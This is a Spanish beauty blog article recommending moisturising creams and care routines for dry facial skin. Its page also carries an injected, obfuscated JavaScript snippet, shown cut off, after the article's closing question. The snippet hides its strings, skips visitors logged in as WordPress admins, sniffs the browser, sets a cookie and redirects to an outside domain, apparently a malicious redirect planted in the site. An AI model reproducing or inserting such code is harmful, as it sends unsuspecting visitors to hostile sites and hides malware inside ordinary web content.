La piel habla por sí misma y cuando vemos un rostro cuidado e hidratado, es muy fácil enamorarse de él. Sin embargo, cuando nos topamos con una dermis seca y descuidada, es fácil pensar ¡qué pena de cutis! No las hay mejores ni peores, pero sí tratamientos específicos para cada una de ellas. Y hoy en día, depende de nosotros cuidarnos por dentro y por fuera. En este tipo de cutis, hay diferentes niveles de sequedad pero en cualquier caso, la hidratación es la clave. Hoy, te vamos a explicar qué cremas son las mejores para cuidar una piel seca.

cremas-para-mujeres

Hidratar por dentro y por fuera

La alimentación es clave para hidratar el cutis desde lo más profundo, así que lo primero que debes revisar es qué tipo de comidas haces. Olvídate de las grasas saturadas,  lejos de pensar que te pueden ayudar a hidratarla, lo que hacen es justo lo contrario: deshidratarla. El alcohol, el tabaco, el aire acondicionado o calefacción en exceso también son terribles para este tipo de cutis. Así que una vez revisados todos estos puntos, pasemos a ver qué cremas te convienen usar.

La hidratación es precisamente lo que tu piel está pidiendo a gritos, así que la Crema Hydrationist con Hidratación profunda de Estée Lauder es un buen comienzo. Combate ese aspecto de envejecimiento, patas de gallo y arrugas sobre todo, que suelen aparecer en este tipo de dermis y de forma prematura. La puedes usar durante todo el día y de forma continuada.

cremas-para-pieles-resecas

El problema que presenta también este tipo de cutis es tirantez y rojeces y para evitar estas molestias, conviene siempre aplicar la crema con el rostro muy limpio. Pero cuidado, no te frotes con agua y jabón porque el aclarado suele ser muy agresivo para la piel y lo que harás será empeorar su estado. Apuesta por leches limpiadoras que contienen mayores niveles de hidratación y además de limpiar, nutren. A continuación, aplica Hydra Essentiel de Clarins que combate los choques térmicos a los que se somete nuestra cara: calor, frío, calefacción, aire acondicionado, aire… y aporta los agentes nutrientes necesarios para devolverle a la piel la luminosidad perdida.

Cómo mantener los niveles de agua

Un tratamiento perfecto para los rostros secos es el layering, ¿habías oído hablar de él? Lo utilizan mucho los asiáticos para nutrir la dermis en profundidad. Se trata de utilizar dos o más cremas, de tal manera que dejamos que la primera actúe y después aplicamos la segunda.  Lo ideal es usar una base de sérum en la primera capa de la piel y después, una crema más densa. El resultado lo notarás en pocos días, ya que es muy eficaz.

tratamiento-piel-seca

También hay componentes en las cremas especialmente hidratantes y naturales a la vez, que protegen las pieles más sensibles de día y de noche. La Intense Nutrition Créme Cocoon Réconfortante de Decléor reactiva los lípidos formando una barrera cutánea de protección espectacular, al mismo tiempo que nutren y alimentan la tez, devolviéndole la flexibilidad perdida. Otra maravillosa crema que puedes usar es Essential Energy de Shiseido trabaja la hidratación, la prevención y la luminosidad. Tiene una textura sedosa y un ingrediente “mágico”, el activo pro-radiance complex, devolviendo al cutis esa sensación de haber recargado energía y luz.

¿Tienes la piel seca y usas alguna crema o tratamiento específico? Nos encantaría conocerlo

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone